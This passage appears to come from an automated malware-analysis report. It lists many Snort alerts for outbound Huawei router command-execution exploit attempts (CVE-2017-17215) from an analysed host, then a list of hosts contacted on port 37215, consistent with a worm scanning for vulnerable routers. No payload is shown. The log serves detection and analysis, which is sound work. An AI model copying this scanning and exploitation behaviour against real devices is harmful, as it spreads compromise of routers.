          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60740 -> 197.2.50.56:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40622 -> 197.127.246.183:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40622 -> 197.127.246.183:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37260 -> 197.193.202.241:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37260 -> 197.193.202.241:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35984 -> 197.175.231.79:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35984 -> 197.175.231.79:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41842 -> 197.73.194.67:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41842 -> 197.73.194.67:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48792 -> 197.24.25.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48792 -> 197.24.25.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52566 -> 197.146.199.182:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52566 -> 197.146.199.182:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56096 -> 197.201.13.5:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56096 -> 197.201.13.5:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35868 -> 197.71.147.155:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35868 -> 197.71.147.155:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42432 -> 197.202.100.24:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42432 -> 197.202.100.24:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46886 -> 197.248.25.139:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46886 -> 197.248.25.139:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55744 -> 197.253.217.76:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55744 -> 197.253.217.76:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60234 -> 197.16.237.17:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60234 -> 197.16.237.17:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59904 -> 197.244.241.46:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59904 -> 197.244.241.46:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41678 -> 197.191.47.11:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41678 -> 197.191.47.11:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46010 -> 197.83.168.124:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46010 -> 197.83.168.124:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48218 -> 197.131.18.169:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48218 -> 197.131.18.169:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35866 -> 197.8.183.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35866 -> 197.8.183.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35336 -> 197.42.66.101:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35336 -> 197.42.66.101:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33880 -> 197.17.54.51:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33880 -> 197.17.54.51:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50732 -> 197.170.228.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50732 -> 197.170.228.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53324 -> 197.144.95.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53324 -> 197.144.95.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36024 -> 197.203.240.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36024 -> 197.203.240.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45978 -> 197.209.40.150:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45978 -> 197.209.40.150:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43890 -> 197.140.206.0:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43890 -> 197.140.206.0:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59440 -> 197.140.228.162:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59440 -> 197.140.228.162:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55552 -> 197.31.125.62:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55552 -> 197.31.125.62:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34652 -> 197.59.107.58:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34652 -> 197.59.107.58:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53570 -> 197.52.109.253:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53570 -> 197.52.109.253:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50192 -> 197.206.196.253:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50192 -> 197.206.196.253:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48202 -> 197.191.213.141:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48202 -> 197.191.213.141:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41434 -> 197.92.142.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41434 -> 197.92.142.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41840 -> 197.103.1.80:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41840 -> 197.103.1.80:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45950 -> 197.12.166.153:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45950 -> 197.12.166.153:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51604 -> 197.225.132.230:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51604 -> 197.225.132.230:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35038 -> 197.57.92.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35038 -> 197.57.92.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39972 -> 197.201.228.26:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39972 -> 197.201.228.26:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56194 -> 197.136.224.230:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56194 -> 197.136.224.230:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46168 -> 197.1.51.252:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46168 -> 197.1.51.252:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35380 -> 197.191.177.218:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35380 -> 197.191.177.218:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49424 -> 197.79.92.126:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49424 -> 197.79.92.126:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50656 -> 197.7.185.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50656 -> 197.7.185.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33572 -> 197.191.61.29:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33572 -> 197.191.61.29:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35126 -> 197.173.162.154:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35126 -> 197.173.162.154:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41166 -> 197.4.134.79:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41166 -> 197.4.134.79:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48436 -> 197.189.169.36:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48436 -> 197.189.169.36:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58866 -> 197.1.161.153:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58866 -> 197.1.161.153:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35988 -> 197.161.243.160:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35988 -> 197.161.243.160:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39172 -> 197.38.5.105:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39172 -> 197.38.5.105:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45050 -> 197.135.89.100:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45050 -> 197.135.89.100:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55208 -> 197.139.4.22:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55208 -> 197.139.4.22:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53254 -> 197.143.128.80:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53254 -> 197.143.128.80:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34856 -> 197.204.205.50:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34856 -> 197.204.205.50:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56026 -> 197.100.217.18:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56026 -> 197.100.217.18:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36464 -> 197.92.175.223:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36464 -> 197.92.175.223:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44468 -> 197.249.181.47:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44468 -> 197.249.181.47:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40446 -> 197.67.211.210:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40446 -> 197.67.211.210:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46632 -> 197.22.156.60:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46632 -> 197.22.156.60:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48914 -> 197.170.193.195:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48914 -> 197.170.193.195:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53902 -> 197.215.75.153:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53902 -> 197.215.75.153:37215
          Source: global trafficTCP traffic: 41.183.242.123 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.229.236.114 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.96.252.111 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.254.165.134 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.225.208.175 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.148.158.55 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.27.198.70 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.27.190.170 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.201.189.4 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.69.166.108 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.220.126.24 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.255.61.204 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.150.0.197 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.44.98.46 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.247.69.171 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.114.147.148 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.153.109.4 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.195.66.86 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.157.30.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.76.209.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.105.116.86 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.7.171.41 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.245.96.79 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.182.62.105 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.121.67.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.249.216.233 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.2.2.7 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.131.220.70 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.250.52.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.203.17.76 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.221.116.9 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.87.57.234 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.157.20.23 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.202.227.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.154.241.96 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.236.84.129 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.15.218.168 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.121.136.85 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.8.213.169 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.173.247.113 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.123.231.210 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.188.150.198 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.101.241.239 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.16.182.160 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.32.44.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.142.5.8 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.99.124.97 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.179.121.105 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.23.255.233 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.236.143.188 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.234.91.193 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.255.188.195 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.207.55.169 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.89.53.22 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.141.247.14 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.63.166.175 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.69.184.161 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.108.233.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.80.35.213 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.65.172.98 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.231.192.243 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.119.157.229 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.68.50.155 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.34.233.91 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.24.75.242 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.237.39.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.67.205.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.210.153.228 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.138.194.115 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.225.101.216 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.84.145.175 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.114.113.88 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.201.49.119 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.133.65.40 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.233.100.224 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.107.60.236 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.167.87.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.5.145.252 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.23.243.43 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.136.218.164 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.174.54.83 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.129.46.64 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.27.70.58 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.222.87.177 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.210.11.39 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.14.101.244 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.169.150.140 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.67.229.211 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.167.3.172 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.203.77.138 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.154.11.149 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.253.151.138 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.38.117.37 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.12.235.179 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.38.28.50 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.18.6.36 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.52.200.146 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.244.221.171 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.161.88.123 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.50.26.94 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.168.184.151 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.108.97.33 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.209.4.172 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.10.248.173 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.107.251.207 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.136.234.143 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.128.124.232 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.96.174.188 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.37.191.249 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.82.57.241 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.66.8.0 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.56.207.103 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.58.248.181 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.239.87.12 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.119.239.202 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.152.80.171 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.108.175.84 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.168.73.165 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.48.192.71 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.93.162.145 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.148.222.226 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.191.248.212 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.153.230.203 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.186.9.157 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.55.16.145 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 41.47.183.64 ports 1,2,3,5,7,37215
